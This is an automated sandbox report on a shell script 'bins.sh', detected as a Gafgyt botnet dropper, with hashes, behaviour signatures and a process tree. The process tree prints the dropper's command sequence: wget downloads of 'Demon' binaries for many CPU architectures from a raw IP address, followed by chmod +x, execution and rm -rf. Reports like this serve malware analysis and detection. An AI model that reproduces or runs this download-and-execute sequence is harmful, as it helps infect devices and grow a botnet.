Analysis
max time kernel: 8s
max time network: 10s
platform: ubuntu-22.04_amd64
resource: ubuntu2204-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu2204-amd64-20240611-en, kernel:5.15.0-105-generic, locale:en-us, os:ubuntu-22.04-amd64, system
submitted: 19-10-2024 11:41
Static task: static1
Behavioral task behavioral1: Sample bins.sh, Resource debian12-armhf-20240418-en
Behavioral task behavioral2: Sample bins.sh, Resource debian12-mipsel-20240729-en
Behavioral task behavioral3: Sample bins.sh, Resource debian9-armhf-20240611-en
Behavioral task behavioral4: Sample bins.sh, Resource debian9-mipsbe-20240418-en
Behavioral task behavioral5: Sample bins.sh, Resource debian9-mipsel-20240611-en
Behavioral task behavioral6: Sample bins.sh, Resource ubuntu1804-amd64-20240611-en
Behavioral task behavioral7: Sample bins.sh, Resource ubuntu2004-amd64-20240611-en
Behavioral task behavioral8: Sample bins.sh, Resource ubuntu2204-amd64-20240611-en
Behavioral task behavioral9: Sample bins.sh, Resource ubuntu2404-amd64-20240523-en
General
Target: bins.sh
Size: 2KB
MD5: a754f4cf9d6ba2d574cd90bf04d1bc35
SHA1: b0191e89c26057b6132f3314fa685e1879c7dc62
SHA256: bf9fa0c44e56d564d8675f89533c1930b9481597d1f0d09153757d595b8ddaa0
SHA512: 600b970d65a1b8d80e0c7e9808cff50fbb610762a97d619293b859383c85ff671a28793f49d8207c984ffe113c63dabfa66d3df4d922b32c79ce707b3393162f
Malware Config
Signatures
Detected Gafgyt variant (1 IoC)
Processes (resource, yara_rule, family):
- /tmp/Demon.mips, family_gafgyt
File and Directory Permissions Modification (1 TTP, 14 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Processes (pid, process):
- 1645 chmod
- 1608 chmod
- 1635 chmod
- 1650 chmod
- 1619 chmod
- 1587 chmod
- 1597 chmod
- 1614 chmod
- 1625 chmod
- 1630 chmod
- 1640 chmod
- 1582 chmod
- 1592 chmod
- 1603 chmod
Executes dropped EXE (1 IoC)
Processes (ioc, pid, process):
- /tmp/Demon.mips, 1583, Demon.mips
Reads system routing table (1 TTP, 3 IoCs)
Gets active network interfaces from /proc virtual filesystem.
Processes (description, ioc, process):
- File opened for reading, /proc/net/route, Demon.x86
- File opened for reading, /proc/net/route, Demon.i686
- File opened for reading, /proc/net/route, Demon.i586
Changes its process name (3 IoCs)
Processes (description, pid, process):
- Changes the process name, possibly in an attempt to hide itself, 1598, Demon.x86
- Changes the process name, possibly in an attempt to hide itself, 1609, Demon.i686
- Changes the process name, possibly in an attempt to hide itself, 1620, Demon.i586
Reads system network configuration (1 TTP, 3 IoCs)
Uses contents of /proc filesystem to enumerate network settings.
Processes (description, ioc, process):
- File opened for reading, /proc/net/route, Demon.i586
- File opened for reading, /proc/net/route, Demon.x86
- File opened for reading, /proc/net/route, Demon.i686
System Network Configuration Discovery (1 TTP, 3 IoCs)
Adversaries may gather information about the network configuration of a system.
Processes (pid, process):
- 1571 wget
- 1583 Demon.mips
- 1585 rm
Writes file to tmp directory (13 IoCs)
Malware often drops required files in the /tmp directory.
Processes (description, ioc, process):
- File opened for modification, /tmp/Demon.arm5, wget
- File opened for modification, /tmp/Demon.mips, wget
- File opened for modification, /tmp/Demon.mpsl, wget
- File opened for modification, /tmp/Demon.sh4, wget
- File opened for modification, /tmp/Demon.arm6, wget
- File opened for modification, /tmp/Demon.i686, wget
- File opened for modification, /tmp/Demon.m68k, wget
- File opened for modification, /tmp/Demon.arm4, wget
- File opened for modification, /tmp/Demon.x86, wget
- File opened for modification, /tmp/Demon.ppc, wget
- File opened for modification, /tmp/Demon.i586, wget
- File opened for modification, /tmp/Demon.sparc, wget
- File opened for modification, /tmp/Demon.arm7, wget
Processes (path, command line, PID; children indented under their parent)
/tmp/bins.sh  /tmp/bins.sh  PID:1570
  /usr/bin/wget  wget http://38.123.149.216/Demon.mips  PID:1571
  - System Network Configuration Discovery
  - Writes file to tmp directory
  /usr/bin/chmod  chmod +x Demon.mips  PID:1582
  - File and Directory Permissions Modification
  /tmp/Demon.mips  ./Demon.mips  PID:1583
  - Executes dropped EXE
  - System Network Configuration Discovery
  /usr/bin/rm  rm -rf Demon.mips  PID:1585
  - System Network Configuration Discovery
  /usr/bin/wget  wget http://38.123.149.216/Demon.mpsl  PID:1586
  - Writes file to tmp directory
  /usr/bin/chmod  chmod +x Demon.mpsl  PID:1587
  - File and Directory Permissions Modification
  /tmp/Demon.mpsl  ./Demon.mpsl  PID:1588
  /usr/bin/rm  rm -rf Demon.mpsl  PID:1590
  /usr/bin/wget  wget http://38.123.149.216/Demon.sh4  PID:1591
  - Writes file to tmp directory
  /usr/bin/chmod  chmod +x Demon.sh4  PID:1592
  - File and Directory Permissions Modification
  /tmp/Demon.sh4  ./Demon.sh4  PID:1593
  /usr/bin/rm  rm -rf Demon.sh4  PID:1595
  /usr/bin/wget  wget http://38.123.149.216/Demon.x86  PID:1596
  - Writes file to tmp directory
  /usr/bin/chmod  chmod +x Demon.x86  PID:1597
  - File and Directory Permissions Modification
  /tmp/Demon.x86  ./Demon.x86  PID:1598
  - Reads system routing table
  - Changes its process name
  - Reads system network configuration
  /usr/bin/rm  rm -rf Demon.x86  PID:1601
  /usr/bin/wget  wget http://38.123.149.216/Demon.arm6  PID:1602
  - Writes file to tmp directory
  /usr/bin/chmod  chmod +x Demon.arm6  PID:1603
  - File and Directory Permissions Modification
  /tmp/Demon.arm6  ./Demon.arm6  PID:1604
  /usr/bin/rm  rm -rf Demon.arm6  PID:1606
  /usr/bin/wget  wget http://38.123.149.216/Demon.i686  PID:1607
  - Writes file to tmp directory
  /usr/bin/chmod  chmod +x Demon.i686  PID:1608
  - File and Directory Permissions Modification
  /tmp/Demon.i686  ./Demon.i686  PID:1609
  - Reads system routing table
  - Changes its process name
  - Reads system network configuration
  /usr/bin/rm  rm -rf Demon.i686  PID:1612
  /usr/bin/wget  wget http://38.123.149.216/Demon.ppc  PID:1613
  - Writes file to tmp directory
  /usr/bin/chmod  chmod +x Demon.ppc  PID:1614
  - File and Directory Permissions Modification
  /tmp/Demon.ppc  ./Demon.ppc  PID:1615
  /usr/bin/rm  rm -rf Demon.ppc  PID:1617
  /usr/bin/wget  wget http://38.123.149.216/Demon.i586  PID:1618
  - Writes file to tmp directory
  /usr/bin/chmod  chmod +x Demon.i586  PID:1619
  - File and Directory Permissions Modification
  /tmp/Demon.i586  ./Demon.i586  PID:1620
  - Reads system routing table
  - Changes its process name
  - Reads system network configuration
  /usr/bin/rm  rm -rf Demon.i586  PID:1623
  /usr/bin/wget  wget http://38.123.149.216/Demon.m68k  PID:1624
  - Writes file to tmp directory
  /usr/bin/chmod  chmod +x Demon.m68k  PID:1625
  - File and Directory Permissions Modification
  /tmp/Demon.m68k  ./Demon.m68k  PID:1626
  /usr/bin/rm  rm -rf Demon.m68k  PID:1628
  /usr/bin/wget  wget http://38.123.149.216/Demon.sparc  PID:1629
  - Writes file to tmp directory
  /usr/bin/chmod  chmod +x Demon.sparc  PID:1630
  - File and Directory Permissions Modification
  /tmp/Demon.sparc  ./Demon.sparc  PID:1631
  /usr/bin/rm  rm -rf Demon.sparc  PID:1633
  /usr/bin/wget  wget http://38.123.149.216/Demon.arm4  PID:1634
  - Writes file to tmp directory
  /usr/bin/chmod  chmod +x Demon.arm4  PID:1635
  - File and Directory Permissions Modification
  /tmp/Demon.arm4  ./Demon.arm4  PID:1636
  /usr/bin/rm  rm -rf Demon.arm4  PID:1638
  /usr/bin/wget  wget http://38.123.149.216/Demon.arm5  PID:1639
  - Writes file to tmp directory
  /usr/bin/chmod  chmod +x Demon.arm5  PID:1640
  - File and Directory Permissions Modification
  /tmp/Demon.arm5  ./Demon.arm5  PID:1641
  /usr/bin/rm  rm -rf Demon.arm5  PID:1643
  /usr/bin/wget  wget http://38.123.149.216/Demon.arm7  PID:1644
  - Writes file to tmp directory
  /usr/bin/chmod  chmod +x Demon.arm7  PID:1645
  - File and Directory Permissions Modification
  /tmp/Demon.arm7  ./Demon.arm7  PID:1646
  /usr/bin/rm  rm -rf Demon.arm7  PID:1648
  /usr/bin/wget  wget http://38.123.149.216/Demon.ppc440fp  PID:1649
  /usr/bin/chmod  chmod +x Demon.ppc440fp  PID:1650
  - File and Directory Permissions Modification
  /tmp/Demon.ppc440fp  ./Demon.ppc440fp  PID:1651
  /usr/bin/rm  rm -rf Demon.ppc440fp  PID:1652
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 211KB
MD5: 455a2acf75de8da6ab7c4d9564cc69f9
SHA1: 9e6016c6581289e685bcd6392bbf0bcf6b1182ff
SHA256: b08dea7aae12f248b7730af3c8f924dd67d3251d78df15a9dfb75e5d961df152
SHA512: a76b00d7f684d762ea9d5fa60d579d70b8bdfe75faedb59baae6ffb676d25d57826cde4a639c0b32dfcc3288a965591e148a489e6259910e3e0dbee90ccadeab